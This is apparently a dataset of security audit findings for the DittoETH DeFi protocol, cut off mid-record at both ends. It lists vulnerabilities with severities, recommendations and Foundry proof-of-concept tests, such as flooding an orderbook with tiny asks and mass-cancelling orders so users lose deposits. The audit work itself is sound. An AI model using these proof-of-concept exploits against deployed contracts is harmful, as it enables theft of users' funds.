deployCode("RocketStorage.sol");\\n _reth = deployCode("RocketTokenRETH.sol");\\n reth = IRocketTokenRETH(_reth);\\n _ethAggregator = deployCode("MockAggregatorV3.sol");\\n /// INFO: added by auditor\\n _rocketStorageA = deployCode("RocketStorage.sol");\\n _rethA = deployCode("RocketTokenRETH.sol");\\n rethA = IRocketTokenRETH(_rethA);\\n }\\n\\n rocketStorage = IRocketStorage(_rocketStorage);\\n /// INFO: added by auditor\\n rocketStorageA = IRocketStorage(_rocketStorageA);\\n steth = ISTETH(_steth);\\n unsteth = IUNSTETH(payable(_unsteth));\\n ethAggregator = IMockAggregatorV3(_ethAggregator);\\n }\\n\\n/// INFO: Added by auditor \\n _zethToBeDeletedVault = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode("Asset.sol:Asset"), abi.encode(_diamond, "Zebra ETH Two", "ZETHT")\\n )\\n );\\n\\n _bridgeRethToBeDeleted = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode("BridgeReth.sol:BridgeReth"),\\n abi.encode(_rocketStorageA, _diamond)\\n )\\n );\\n\\n bridgeRethToBeDeleted = IBridge(_bridgeRethToBeDeleted);\\n MTypes.CreateVaultParams memory vaultParams;\\n vaultParams.zethTithePercent = 10_00;\\n vaultParams.dittoMatchedRate = 1;\\n vaultParams.dittoShorterRate = 1;\\n diamond.createVault({zeth: _zeth, vault: Vault.CARBON, params: vaultParams});\\n\\n MTypes.CreateVaultParams memory vaultParamsTwo;\\n vaultParamsTwo.zethTithePercent = 9_00;\\n vaultParamsTwo.dittoMatchedRate = 1;\\n vaultParamsTwo.dittoShorterRate = 1;\\n zethToBeDeletedVault = IAsset(_zethToBeDeletedVault);\\n diamond.createVault({zeth: _zethToBeDeletedVault, vault: 2, params: vaultParamsTwo});\\n STypes.Vault memory carbonVaultConfigTwo = diamond.getVaultStruct(2);\\n assertEq(carbonVaultConfigTwo.zethTithePercent, 9_00);\\n\\n diamond.createBridge({\\n bridge: _bridgeRethToBeDeleted,\\n vault: 2,\\n withdrawalFee: 150,\\n unstakeFee: 0\\n });\\n \\n if (isMock) {\\n rocketStorage.setDeposit(_reth);\\n rocketStorage.setReth(_reth);\\n /// INFO: added by auditor\\n rocketStorageA.setDeposit(_rethA);\\n rocketStorageA.setReth(_rethA);\\n _setETH(4000 ether);\\n }\\n```\\n\\nTo run the test use `forge test -vvv --mt test_DeleteBridgeWithAsset`
In `deleteBridge()` make sure that the contract doesn't have any assets
User's deposited `RETH` or `STETH` in that bridge will be lost, as the user doesn't have the option to withdraw them. Because the withdraw functions can only be called trough the `Diamond.sol`
```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log("Sender ethEscrowed in vault 2 before deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log("Sender ethEscrowed in vault2 after deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log("Sender ethEscrowed after withdraw: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n
Users Lose Funds and Market Functionality Breaks When Market Reachs 65k Id
high
if the orderbook of any market reach 65,000 dao can call the function cancelOrderFarFromOracle multiple times to cancel many orders up to 1000 order in each transaction ,or anyone can cancle the last order in one call.the users who issued the canclled orders will lost thier deposits.and the canclled process is not limited to a certain orders numbers.\\nsource : contracts/facets/OrderFacet.sol\\nFunction : cancelOrderFarFromOracle\\nwhen ever a user create a limit order (short limit,bid limit,ask limit), if the order did not match it get added to the orderbook, and the `assets amount` or `eth amount` uses to create this order is taken from the Virtual balance of the user in the system .\\nuserVault(in case of `bids` and shorts) or userAsset(in case of asks) we can see that here :\\n` // for asks:\\n s.assetUser[asset][order.addr].ercEscrowed -= order.ercAmount;\\n // for `shorts` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;\\n //for `bids` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;`\\nalso if there is no id's Recycled behind the Head the id for this orders gonna be the current id in s.asset[asset].orderId,and the `s.asset[asset].orderId` get increamented by one . this is true for all three types of orders. (shorts,asks,bids).\\nnow in case this ordersId reach 65k for a specific market, the DAO are able to cancle the last 1000 order, and any one can cancle last order in one call. since it's only checks for the ordersId > 65000.and by the last order i mean the last order of any time of limit orders (asks,shorts,bids).\\n`function cancelOrderFarFromOracle(address asset, O orderType, uint16 lastOrderId, uint16 numOrdersToCancel)\\n external\\n onlyValidAsset(asset)\\n nonReentrant\\n{\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n\\n if (msg.sender == LibDiamond.diamondStorage().contractOwner) {\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n } else {\\n //@dev if address is not DAO, you can only cancel last order of a side\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelOrder(asset, lastOrderId);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n }\\n}\\n... ....\\n// cancle many orders no extra checks :\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n...... .....\\n// no extrac checks in cancleOrder() function also. it set the order to Cancelled , remove it from the list, and Set it to be reused:\\nfunction cancelOrder(mapping(address => mapping(uint16 => STypes.Order)) storage orders, address asset, uint16 id)\\n internal\\n {\\n uint16 prevHEAD = orders[asset][Constants.HEAD].prevId;\\n\\n // remove the links of ID in the market\\n // @dev (ID) is exiting, [ID] is inserted\\n // BEFORE: PREV <-> (ID) <-> NEXT\\n // AFTER : PREV <----------> NEXT\\n orders[asset][orders[asset][id].nextId].prevId = orders[asset][id].prevId;\\n orders[asset][orders[asset][id].prevId].nextId = orders[asset][id].nextId;\\n\\n // create the links using the other side of the HEAD\\n emit Events.CancelOrder(asset, id, orders[asset][id].orderType);\\n _reuseOrderIds(orders, asset, id, prevHEAD, O.Cancelled);\\n}`\\nas we said the user balance get decreaced by the `value` of it's order he created. but since the order is set to cancelled the user never gonna be able to recieve thier amount back.cause cancelled orders can't be matched Neither cancelled again.\\nEx:\\na user create a limit bid as follow : {price: 0.0001 ether, amount: 10000 ether}.\\nwhen this order get cancelled : the user will loose : 0.0001 * 10000 = `1 ether` ZETH (or ETH)\\nthe shorters will lose more then others since thier balance get decreaced by : PRICE * AMOUNT * MARGIN.\\nThe second issue is there is no limit for how many orders can be cancelled. you can cancel the whole orders in a market that reaches 65K `orderId`. `limits shorts` ,limits `asks` or `limit bids` .starting from the last one.since the only Conditionto be able to cancel orders is the asset order ID reached this number. and if it reachs it. it never decrease .even if there is alot of orders behind head(non active) to be reused.\\na malicious actor Can targeted this vulnerability by creating numerous tiny limit `asks` pushing the `orderId` to be too high .and he can do so by creating `ask` with a very high price and very small amount so he can pass the `MinEth` amount check, he can just with less then `1 cusd` (in case of cusd market) create a bunsh of limit `asks` orders .\\nPOC :\\nusing the the main repo setup for testing , here a poc shows how a malicious user can fill the orderbook with bunsh of tiny `limit asks` with little cost. and how you can cancle all orders in case the orderId reachs 65k. also that there is no refund for the users that created this orders.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from "contracts/libraries/Errors.sol";\\nimport {Events} from "contracts/libraries/Events.sol";\\nimport {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";\\nimport {Constants} from "contracts/libraries/Constants.sol";\\nimport "forge-std/console.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\n// import {console} from "contracts/libraries/console.sol";\\n\\ncontract POC is OBFixture {\\n address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n address attacker = address(3234);\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n // an attacker can fill the order book with a bunsh of asks that have too high price and low asset \\n function test_fillWithAsks() public {\\n // create a bunsh of asks with a high price :\\n depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n vm.startPrank(attacker);\\n for (uint i ; i< 1000 ;i++){\\n createLimitAsk( 10**24, 10**10); \\n }\\n vm.stopPrank();\\n STypes.Order[] memory asks = diamond.getAsks(asset);\\n console.log("tiny asks created : ", asks.length);\\n console.log( "hack cost asset", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n }\\n function test_cancleOrders() public {\\n //set the assetid to 60000;\\n diamond.setOrderIdT(asset,64998);\\n // create multiple bids and 1 shorts\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n /* now we have the lists like this :\\n - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i<bidders.length;i++){\\n // check that there is no refund for the users : \\n uint ethUser = diamond.getZethBalance(vault,bidders[i]);\\n console.log('balance of : ', bidders[i],ethUser);\\n assertEq(ethUser ,0);\\n }\\n // also we can cancle the shorts and the asks, i don't wanna make POC to long , but this is the idea.you can cancle all the orders of a market if this market reach 65000,\\n assertEq(diamond.getShorts(asset).length,1);\\n diamond.cancelOrderFarFromOracle(asset, O.LimitShort, 64999, 1);\\n assertEq(diamond.getShorts(asset).length,0);\\n\\n }\\n function canclebid(uint16 id) public {\\n diamond.cancelOrderFarFromOracle(asset, O.LimitBid, id, 1);\\n }\\n\\n\\n}\\n```\\n\\nconsole after running test :\\n```\\n [PASS] test_cancleOrders() (gas: 1218326)\\nLogs:\\n balance of : 0x000000000000000000000000000000000006A4E9 0\\n balance of : 0x00000000000000000000000000000000193d114b 0\\n balance of : 0x000000000000000000000000000000000007f87E 0\\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 222.12ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n\\nfor creating bunsh of tiny asks :\\n```\\n[PASS] test_fillWithAsks() (gas: 860940067)\\nLogs:\\n tiny asks created : 1000\\n hack cost asset 10000000000000 (which is less then 1 cusd) \\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.17s\\n \\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n\\nimpact :\\nusers will lose thier `zeth` or `Erc` pagged asset dependens on the order type .\\nany type of orders in this market (shorts,asks,bids) can be effected and cancelled even if there is a lot of non active ids to be reused.\\nthe whole orders in a market can be canncelled without refunding the orders creators.\\ntools used :\\nmanual review
Users Lose Funds and Market Functionality Breaks When Market Reachs 65k Id\\nbefore cancling the orders , check that there is no orders to be reuse or the diffrence between the current orderId (s.asset[asset].orderId) , and the orders to be reused (behind the Head) of this market are Greater then 65000.\\n```\\n// sudo code recommand , but it's really depends on the team how to handle that:\\n if (s.asset[asset].OrderId) - (shorts.unActiveIds + asks.unActiveIds + bids.unActiveIds) < 65k revert.\\n```\\n
null
```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from "contracts/libraries/Errors.sol";\\nimport {Events} from "contracts/libraries/Events.sol";\\nimport {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";\\nimport {Constants} from "contracts/libraries/Constants.sol";\\nimport "forge-std/console.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\n// import {console} from "contracts/libraries/console.sol";\\n\\ncontract POC is OBFixture {\\n address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n address attacker = address(3234);\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n // an attacker can fill the order book with a bunsh of asks that have too high price and low asset \\n function test_fillWithAsks() public {\\n // create a bunsh of asks with a high price :\\n depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n vm.startPrank(attacker);\\n for (uint i ; i< 1000 ;i++){\\n createLimitAsk( 10**24, 10**10); \\n }\\n vm.stopPrank();\\n STypes.Order[] memory asks = diamond.getAsks(asset);\\n console.log("tiny asks created : ", asks.length);\\n console.log( "hack cost asset", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n }\\n function test_cancleOrders() public {\\n //set the assetid to 60000;\\n diamond.setOrderIdT(asset,64998);\\n // create multiple bids and 1 shorts\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n /* now we have the lists like this :\\n - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i<bidders.length;i++){\\n // check that there is no refund for the users : \\n uint ethUser = diamond.getZethBalance(vault,bidders[i]);\\n console.log('balance of : ', bidders[i],ethUser);\\n assertEq(ethUser ,0);\\n }\\n // also we can cancle the shorts and the asks, i don't wanna make POC to long , but this is the idea.you can cancle all the orders of a market if this market reach 65000,\\n assertEq(diamond.getShorts(asset).length,1);\\n diamond.cancelOrderFarFromOracle(asset, O.LimitShort, 64999, 1);\\n assertEq(diamond.getShorts(asset).length,0);\\n\\n }\\n function canclebid(uint16 id) public {\\n diamond.cancelOrderFarFromOracle(asset, O.LimitBid, id, 1);\\n }\\n\\n\\n}\\n```\\n
Possible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds
medium
Future changes on deposit delay on rETH tokens would prevent DittoETH users to use deposit(), withdraw() and unstake() for BridgeReth, which would make its transfering and burning impractical, leading to user funds losses.\\nRocketPool rETH tokens has a deposit delay that prevents any user who has recently deposited to transfer or burn tokens. In the past this delay was set to 5760 blocks mined (aprox. 19h, considering one block per 12s). This delay can prevent DittoETH users from transfering if another user staked recently.\\nFile: RocketTokenRETH.sol\\n```\\n // This is called by the base ERC20 contract before all transfer, mint, and burns\\n function _beforeTokenTransfer(address from, address, uint256) internal override {\\n // Don't run check if this is a mint transaction\\n if (from != address(0)) {\\n // Check which block the user's last deposit was\\n bytes32 key = keccak256(abi.encodePacked("user.deposit.block", from));\\n uint256 lastDepositBlock = getUint(key);\\n if (lastDepositBlock > 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256("dao.protocol.setting.network"), "network.reth.deposit.delay")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, "Not enough time has passed since deposit");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n\\nAny future changes made to this delay by the admins could potentially lead to a denial-of-service attack on the `BridgeRouterFacet::deposit` and `BridgeRouterFacet::withdraw` mechanism for the rETH bridge.
Possible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds\\nConsider modifying Reth bridge to obtain rETH only through the UniswapV3 pool, on average users will get less rETH due to the slippage, but will avoid any future issues with the deposit delay mechanism.
Currently, the delay is set to zero, but if RocketPool admins decide to change this value in the future, it could cause issues. Specifically, protocol users staking actions could prevent other users from unstaking for a few hours. Given that many users call the stake function throughout the day, the delay would constantly reset, making the unstaking mechanism unusable. It's important to note that this only occurs when stake() is used through the rocketDepositPool route. If rETH is obtained from the Uniswap pool, the delay is not affected.\\nAll the ETH swapped for rETH calling `BridgeReth::depositEth` would become irrecuperable, leading to a user bank run on DittoETH to not be perjudicated of this protocol externalization to all the users that have deposited.
```\\n // This is called by the base ERC20 contract before all transfer, mint, and burns\\n function _beforeTokenTransfer(address from, address, uint256) internal override {\\n // Don't run check if this is a mint transaction\\n if (from != address(0)) {\\n // Check which block the user's last deposit was\\n bytes32 key = keccak256(abi.encodePacked("user.deposit.block", from));\\n uint256 lastDepositBlock = getUint(key);\\n if (lastDepositBlock > 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256("dao.protocol.setting.network"), "network.reth.deposit.delay")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, "Not enough time has passed since deposit");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n
ETH cannot always be unstaked using Rocket Pool
low
The protocol lets users unstake Ethereum using any bridge they want. Rocket Pool may not have enough ETH to satisfy unstake transactions, this will cause the transaction to revert.\\nWhen users try to unstake ETH using Rocket Pool, the transaction may revert because Rocket Pool may not have enough ETH in its deposit pool and rEth contract to satisfy the unstake request. Rocket pool sources ETH for unstaking from the rEth contract and deposit pool. When they are empty it cannot satisfy unstake requests. More information can be found in the Unstake section of the rocketPool documentation.\\nThe pools have been empty before. Here's a proof of concept of failed withdrawals when Rocket Pool's rEth contract and deposit pool were empty at block 15361748.\\n```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString("MAINNET_RPC_URL");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert("Insufficient ETH balance for exchange");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n
Check if Rocket Pool has enough ETH and if it doesn't, rEth can be exchanged for ETH on a DEX and sent to the user.
If Rocket Pool's rEth contract and deposit Pool do not have enough ETH to satisfy an unstake transaction the transaction will revert.
```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString("MAINNET_RPC_URL");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert("Insufficient ETH balance for exchange");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n
Users can avoid liquidation while being under the primary liquidation ratio if on the last short record
high
The protocol permits users to maintain up to 254 concurrent short records. When this limit is reached, any additional orders are appended to the final position, rather than creating a new one. A short record is subject to flagging if it breaches the primary liquidation ratio set by the protocol, leading to potential liquidation if it remains below the threshold for a predefined period.\\nThe vulnerability emerges from the dependency of liquidation times on the `updatedAt` value of shorts. For the last short record, the appending of any new orders provides an alternative pathway for updating the `updatedAt` value of shorts, enabling users to circumvent liquidation by submitting minimal shorts to block liquidation by adjusting the time difference, thus avoiding liquidation even when they do not meet the collateral requirements for a healthy state.\\nlets take a look at the code to see how this works.\\nFlagging of Short Record:\\nThe `flagShort` function allows a short to be flagged if it's under `primaryLiquidationCR`, subsequently invoking `setFlagger` which updates the short's `updatedAt` timestamp to the current time.\\n```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n\\nLiquidation Eligibility Check:\\nThe `_canLiquidate` function assesses whether the flagged short is still under `primaryLiquidationCR` after a certain period and if it's eligible for liquidation, depending on the `updatedAt` timestamp and various liquidation time frames.\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n {\\n // Initial code\\n\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n\\n if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n\\n return true;\\n }\\n }\\n}\\n```\\n\\nShort Record Merging:\\nFor the last short record, the `fillShortRecord` function combines new matched shorts with the existing one, invoking the `merge` function, which updates the `updatedAt` value to the current time.\\n```\\nfunction fillShortRecord(\\n address asset,\\n address shorter,\\n uint8 shortId,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint256 ercDebtRate,\\n uint256 zethYieldRate\\n ) internal {\\n AppStorage storage s = appStorage();\\n\\n uint256 ercDebtSocialized = ercAmount.mul(ercDebtRate);\\n uint256 yield = collateral.mul(zethYieldRate);\\n\\n STypes.ShortRecord storage short = s.shortRecords[asset][shorter][shortId];\\n if (short.status == SR.Cancelled) {\\n short.ercDebt = short.collateral = 0;\\n }\\n\\n short.status = status;\\n LibShortRecord.merge(\\n short,\\n ercAmount,\\n ercDebtSocialized,\\n collateral,\\n yield,\\n LibOrders.getOffsetTimeHours()\\n );\\n }\\n```\\n\\nIn the merge function we see that we update the updatedAt value to creationTime which is LibOrders.getOffsetTimeHours().\\n```\\nfunction merge(\\n STypes.ShortRecord storage short,\\n uint88 ercDebt,\\n uint256 ercDebtSocialized,\\n uint88 collateral,\\n uint256 yield,\\n uint24 creationTime\\n ) internal {\\n // Resolve ercDebt\\n ercDebtSocialized += short.ercDebt.mul(short.ercDebtRate);\\n short.ercDebt += ercDebt;\\n short.ercDebtRate = ercDebtSocialized.divU64(short.ercDebt);\\n // Resolve zethCollateral\\n yield += short.collateral.mul(short.zethYieldRate);\\n short.collateral += collateral;\\n short.zethYieldRate = yield.divU80(short.collateral);\\n // Assign updatedAt\\n short.updatedAt = creationTime;\\n }\\n```\\n\\nThis means that even if the position was flagged and is still under the `primaryLiquidationCR`, it cannot be liquidated as the `updatedAt` timestamp has been updated, making the time difference not big enough.\\n
Impose stricter conditions for updating the last short record when the position is flagged and remains under the `primaryLiquidationCR` post-merge, similar to how the `combineShorts` function works.\\n```\\nfunction createShortRecord(\\n address asset,\\n address shorter,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint64 ercDebtRate,\\n uint80 zethYieldRate,\\n uint40 tokenId\\n ) internal returns (uint8 id) {\\n AppStorage storage s = appStorage();\\n\\n // Initial code\\n\\n } else {\\n // All shortRecordIds used, combine into max shortRecordId\\n id = Constants.SHORT_MAX_ID;\\n fillShortRecord(\\n asset,\\n shorter,\\n id,\\n status,\\n collateral,\\n ercAmount,\\n ercDebtRate,\\n zethYieldRate\\n );\\n\\n // If the short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (Constants.SHORT_MAX_ID.shortFlagExists) {\\n if (\\n Constants.SHORT_MAX_ID.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n Constants.SHORT_MAX_ID.resetFlag();\\n }\\n }\\n }\\n```\\n
This allows a user with a position under the primaryLiquidationCR to avoid primary liquidation even if the short is in the valid time ranges for liquidation.
```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n
Incorrect require in setter
low
There are 3 setters in `OwnerFacet.sol` which require statement doesn't match with the error message.\\n`_setInitialMargin`, `_setPrimaryLiquidationCR` and `_setSecondaryLiquidationCR` will revert for the value 100, which will revert with an incorrect error message, which is `"below 1.0"`. When 100 is 1.0, not below.\\n*Instances (3)`\\n```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, "below 1.0"); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, "above max CR");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, "below 1.0"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, "above 5.0");\\n require(value < s.asset[asset].initialMargin, "above initial margin");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, "below 1.0"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, "above 5.0");\\n require(value < s.asset[asset].primaryLiquidationCR, "above primary liquidation");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n\\nAs it is contrastable, in the below functions, this check is done correctly:\\n```\\n function 